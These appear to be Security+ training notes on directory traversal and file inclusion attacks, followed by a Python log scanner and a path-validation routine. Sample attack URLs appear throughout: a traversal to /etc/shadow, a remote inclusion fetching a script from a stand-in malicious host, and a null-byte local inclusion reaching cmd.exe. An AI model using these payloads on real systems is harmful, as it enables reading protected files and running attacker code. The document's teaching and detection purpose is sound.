Directory Traversal Attack
(OBJ 2.4)
Directory Traversal Attack
- An injection attack occurs when the attacker inserts malicious code through an application interface
  - A Directory Traversal is a type of injection attack
- Application attack that allows access to commands, files, and directories that may or may not be connected to the web document root directory
  - `http://diontraining.com/../../../../etc/shadow`
  - Unix systems use `../`
  - Windows systems use `..\` by default but may also accept the Unix-like `../`
  - In this example the `../` is doing the Directory Traversal
- Directory traversals may be used to access any file on a system with the right permissions
  - If the server is configured correctly, attackers are not going to have access as a web user to read my shadow/passwd file.
- Each `../` moves into the folder below it (the parent directory), and so on until reaching the desired directory
WARNING
- Attackers may use encoding to hide directory traversal attempts (`%2e%2e%2f` represents `../`)
File Inclusion
- Web application vulnerability that allows an attacker either to download a file from an arbitrary location on the host file system or to upload an executable or script file to open a backdoor
- Remote File Inclusion
  - An attacker executes a script to inject a remote file into the web app or website
  - `https://diontraining.com/login.php?user=http://malware.bad/malicious.php`
  - We're passing this parameter, and when our system executes and tries to find that parameter to load it into our database, instead we're going to load in this malicious script.
  - We're including this remote file, malicious.php, from this other website into my web server using this type of command.
- Local File Inclusion
  - An attacker adds a file to the web app or website that already exists on the hosting server
  - `https://diontraining.com/login.php?user=../../Windows/system32/cmd.exe%00`
  - They're trying to go up two directories, into the Windows directory, down into System32, and run the command shell.
  - This way they can run any program they want that executes in DOS or Windows
  - The `%00` at the end is a common tactic used to insert a null character at the end of the URL; `%00` in URL encoding is essentially a null character.
  - This is used to bypass the security mechanism that would normally add a `.php` to the end of the request, and instead allows the `.exe` extension to be used.
- Logs containing `../` pertain to directory traversals
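As an added example (not part of the original notes), the script below scans access-log lines for the traversal indicators described above: the Unix `../` and Windows `..\` sequences, the `%00` null byte, and percent-encoded forms such as `%2e%2e%2f`. The log lines are constructed for illustration and the Common Log Format layout is an assumption; the decoder loops so that double-encoded requests are caught as well, which goes slightly beyond the single-encoding case in the notes.

```python
"""Scan web-server access-log lines for directory-traversal indicators.

Added example, not from the original notes. The log lines below are
constructed; a Common Log Format request line is assumed.
"""
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Jul/2025:16:10:13 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.7 - - [14/Jul/2025:16:10:14 +0000] "GET /../../../../etc/shadow HTTP/1.1" 403 0',
    '203.0.113.9 - - [14/Jul/2025:16:10:15 +0000] "GET /login.php?user=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 0',
    '203.0.113.11 - - [14/Jul/2025:16:10:16 +0000] "GET /login.php?user=..%5c..%5cWindows%5csystem32%5ccmd.exe%00 HTTP/1.1" 200 0',
]

# Pull the request target out of the quoted "METHOD target HTTP/x" field.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD|PUT|DELETE) (\S+) HTTP/')


def decode_target(target: str) -> str:
    """Percent-decode until the value stops changing (catches %252e double encoding)."""
    for _ in range(3):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def traversal_indicators(line: str) -> list[str]:
    """Return the list of traversal indicators found in one log line ([] if clean)."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    raw = match.group(1)
    decoded = decode_target(raw)
    findings = []
    if "../" in decoded:
        findings.append("unix_traversal")
    if "..\\" in decoded:
        findings.append("windows_traversal")
    if "\x00" in decoded:
        findings.append("null_byte")
    # Only flag encoding when it actually hid one of the indicators above.
    if findings and raw != decoded:
        findings.append("percent_encoded")
    return findings


def scan(lines):
    """Map line index -> indicators for every line that has at least one."""
    return {i: f for i, line in enumerate(lines) if (f := traversal_indicators(line))}


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(f"line {idx}: {', '.join(hits)}")
        print("   ", SAMPLE_LOG[idx])
```

Note that the decoded request is checked rather than the raw one; a rule that only greps the raw log for `../` misses the `%2e%2e%2f` form the WARNING above describes.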
Prevention
- To prevent directory traversals and file inclusion attacks, use proper input validation
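As an added example of the input validation this section calls for (not code from the original notes), the function below takes the `user` parameter from the File Inclusion examples above and resolves it inside a fixed document root: it decodes the value, rejects null bytes and anything URL-like (which covers the remote-inclusion case), canonicalizes away `../` and `..\`, confirms the result still lies under the root, and applies a suffix allow-list so `cmd.exe` is never served. A stricter allow-list lookup is shown alongside it. The document root `/srv/www`, the page table and the file names are constructed assumptions.

```python
"""Validate a user-supplied file name before using it to open a file.

Added example, not from the original notes. DOC_ROOT and PAGES are
constructed values; the root does not need to exist on disk.
"""
from __future__ import annotations

import re
from pathlib import Path
from urllib.parse import unquote

DOC_ROOT = Path("/srv/www")                      # constructed document root
ALLOWED_SUFFIXES = {".php", ".html", ".txt"}      # never .exe or the like


def resolve_under_root(doc_root: Path, user_value: str) -> Path | None:
    """Return the canonical path for user_value if it stays under doc_root, else None."""
    decoded = unquote(user_value)
    if "\x00" in decoded:          # %00 would truncate the name in C-based layers
        return None
    if ":" in decoded:             # scheme/URL marker: blocks http://... remote inclusion
        return None
    decoded = decded = decoded.replace("\\", "/")   # treat ..\ like ../ on every platform
    root = doc_root.resolve()
    # Joining an absolute value (e.g. "/etc/passwd") discards root; resolve()
    # collapses any ../ segments. Both cases fail the containment check below.
    candidate = (root / decoded).resolve()
    if not candidate.is_relative_to(root):
        return None
    if candidate.suffix not in ALLOWED_SUFFIXES:
        return None
    return candidate


def serve_path(user_value: str) -> str | None:
    """Convenience wrapper around resolve_under_root for the constructed DOC_ROOT."""
    path = resolve_under_root(DOC_ROOT, user_value)
    return None if path is None else str(path)


# Stricter alternative: the parameter is a key, never a path. Only known
# keys map to files, so traversal characters cannot reach the filesystem.
NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")
PAGES = {"login": "login.php", "home": "index.html"}   # constructed table


def lookup_page(key: str) -> str | None:
    """Map an allow-listed key to a file under DOC_ROOT, or None."""
    if not NAME_RE.fullmatch(key):
        return None
    name = PAGES.get(key)
    return None if name is None else str(DOC_ROOT / name)


if __name__ == "__main__":
    for value in ["index.html", "../../../../etc/shadow",
                  "%2e%2e%2f%2e%2e%2fetc%2fpasswd",
                  "..%5c..%5cWindows%5csystem32%5ccmd.exe%00",
                  "http://malware.bad/malicious.php"]:
        print(f"{value!r:55} -> {serve_path(value)}")
```

The canonicalization check is the general defence: it does not try to enumerate every encoding of `../`, it resolves the path and asks whether the result is still inside the root. The key-lookup variant is simpler still and is preferable whenever the set of includable files is known in advance.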